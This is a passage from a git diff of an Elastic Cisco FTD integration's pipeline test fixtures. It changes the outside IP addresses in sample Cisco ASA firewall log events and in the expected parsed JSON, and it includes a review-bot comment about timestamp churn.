dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src 
outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json
index 40735d586d3..7c4b90f46d0 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json
@@ -10,8 +10,8 @@
 },
 "destination": {
 "port": 8256,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1772,
@@ -51,7 +51,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -59,8 +59,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-09-07T12:21:32.721191900Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256",
+ "ingested": "2021-12-09T13:34:28.099034Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -93,8 +93,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.205.104",
- "ip": "100.66.205.104"
+ "address": "192.168.205.104",
+ "ip": "192.168.205.104"
 },
 "tags": [
 "preserve_original_event"
@@ -129,7 +129,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.205.104",
+ "192.168.205.104",
 "172.31.98.44"
 ]
 },
@@ -138,8 +138,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-09-07T12:21:32.721218700Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)",
+ "ingested": "2021-12-09T13:34:28.099043200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -155,7 +155,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.205.104",
+ "mapped_source_ip": "192.168.205.104",
 "connection_id": "11757",
 "source_interface": "outside",
 "mapped_destination_port": 1772
@@ -177,8 +177,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.211.242",
- "ip": "100.66.211.242"
+ "address": "192.168.211.242",
+ "ip": "192.168.211.242"
 },
 "tags": [
 "preserve_original_event"
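Review bot: The `event.ingested` values rewritten in this hunk (`- "ingested": "2021-09-07T12:21:32.721191900Z"` → `+ "ingested": "2021-12-09T13:34:28.099034Z"`) are run-time noise unrelated to the address change, and the same churn recurs in the `@@ -138`, `@@ -224`, `@@ -309`, `@@ -394` and `@@ -479` hunks. Every regeneration of this expected file will rewrite that field again, burying the one-line `original`/`ip` differences a reviewer actually needs to check. If the test case's config does not already declare it, marking the field as dynamic (`dynamic_fields:` with `event.ingested: ".*"`) keeps it out of the comparison; that is the elastic-package mechanism as I understand it, so confirm against the package-spec version in use. Separately, the replaced 100.66.x.x peers were in the 100.64.0.0/10 shared address space and the new 192.168.x.x peers are RFC 1918 private space like the 172.31.x.x inside addresses, and since these hunks alter nothing beyond `address`, `ip`, `original` and `ingested`, the pipeline output appears not to depend on the outside peer being non-private — worth confirming rather than assuming, because a fixture with no routable peer no longer exercises that path.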
@@ -213,7 +213,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -224,8 +224,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721225600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099049400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -262,8 +262,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -298,7 +298,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -309,8 +309,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721231Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099055100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -347,8 +347,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" 
@@ -383,7 +383,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -394,8 +394,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721235900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099060900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -432,8 +432,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -468,7 +468,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -479,8 +479,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721240200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099066600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -517,8 +517,8 @@ }, "source": { "port": 80, - "address": "100.66.160.197", - "ip": "100.66.160.197" + "address": "192.168.160.197", + "ip": "192.168.160.197" }, "tags": [ "preserve_original_event" 
@@ -553,7 +553,7 @@ "localhost" ], "ip": [ - "100.66.160.197", + "192.168.160.197", "172.31.98.44" ] }, @@ -564,8 +564,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721244600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099072300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -602,8 +602,8 @@ }, "source": { "port": 80, - "address": "100.66.205.14", - "ip": "100.66.205.14" + "address": "192.168.205.14", + "ip": "192.168.205.14" }, "tags": [ "preserve_original_event" @@ -638,7 +638,7 @@ "localhost" ], "ip": [ - "100.66.205.14", + "192.168.205.14", "172.31.98.44" ] }, @@ -649,8 +649,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721249200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099078Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -687,8 +687,8 @@ }, "source": { "port": 80, - "address": "100.66.124.33", - "ip": "100.66.124.33" + "address": "192.168.124.33", + "ip": "192.168.124.33" }, "tags": [ "preserve_original_event" 
@@ -723,7 +723,7 @@ "localhost" ], "ip": [ - "100.66.124.33", + "192.168.124.33", "172.31.98.44" ] }, @@ -734,8 +734,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721254500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099083800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -772,8 +772,8 @@ }, "source": { "port": 80, - "address": "100.66.35.9", - "ip": "100.66.35.9" + "address": "192.168.35.9", + "ip": "192.168.35.9" }, "tags": [ "preserve_original_event" @@ -808,7 +808,7 @@ "localhost" ], "ip": [ - "100.66.35.9", + "192.168.35.9", "172.31.98.44" ] }, @@ -819,8 +819,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721259Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099089600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -857,8 +857,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" 
@@ -893,7 +893,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -904,8 +904,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721265Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099095400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -942,8 +942,8 @@ }, "source": { "port": 80, - "address": "100.66.218.21", - "ip": "100.66.218.21" + "address": "192.168.218.21", + "ip": "192.168.218.21" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ "localhost" ], "ip": [ - "100.66.218.21", + "192.168.218.21", "172.31.98.44" ] }, @@ -989,8 +989,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721270300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099101600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1027,8 +1027,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" 
@@ -1063,7 +1063,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1074,8 +1074,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721275100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099107400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1112,8 +1112,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1148,7 +1148,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1159,8 +1159,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721279800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099112400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1197,8 +1197,8 @@ }, "source": { "port": 80, - "address": "100.66.202.211", - "ip": "100.66.202.211" + "address": "192.168.202.211", + "ip": "192.168.202.211" }, "tags": [ "preserve_original_event" 
@@ -1233,7 +1233,7 @@ "localhost" ], "ip": [ - "100.66.202.211", + "192.168.202.211", "172.31.98.44" ] }, @@ -1244,8 +1244,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721284900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099115900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1282,8 +1282,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1318,7 +1318,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1329,8 +1329,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721289900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099120400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -1367,8 +1367,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" 
@@ -1403,7 +1403,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1414,8 +1414,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721295Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099125600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1452,8 +1452,8 @@ }, "source": { "port": 80, - "address": "100.66.209.247", - "ip": "100.66.209.247" + "address": "192.168.209.247", + "ip": "192.168.209.247" }, "tags": [ "preserve_original_event" @@ -1488,7 +1488,7 @@ "localhost" ], "ip": [ - "100.66.209.247", + "192.168.209.247", "172.31.98.44" ] }, @@ -1499,8 +1499,8 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721301Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099130700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:45.000Z", @@ -1537,8 +1537,8 @@ }, "source": { "port": 80, - "address": "100.66.35.162", - "ip": "100.66.35.162" + "address": "192.168.35.162", + "ip": "192.168.35.162" }, "tags": [ "preserve_original_event" 
@@ -1573,7 +1573,7 @@ "localhost" ], "ip": [ - "100.66.35.162", + "192.168.35.162", "172.31.98.44" ] }, @@ -1584,8 +1584,8 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-09-07T12:21:32.721305600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "ingested": "2021-12-09T13:34:28.099136500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:26.000Z", @@ -1617,8 +1617,8 @@ }, "destination": { "port": 1188, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -1658,7 +1658,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -1666,8 +1666,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721310300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188", + "ingested": "2021-12-09T13:34:28.099140700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1700,8 +1700,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1736,7 +1736,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, 
@@ -1745,8 +1745,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721314900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099145100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1762,7 +1762,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.80.32", + "mapped_source_ip": "192.168.80.32", "connection_id": "11758", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1784,8 +1784,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1820,7 +1820,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1830,8 +1830,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721319300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", + "ingested": "2021-12-09T13:34:28.099148600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -1868,8 +1868,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1904,7 +1904,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1913,8 +1913,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721323900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099153Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1930,7 +1930,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.6", + "mapped_source_ip": "192.168.252.6", "connection_id": "11759", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1952,8 +1952,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1988,7 +1988,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, 
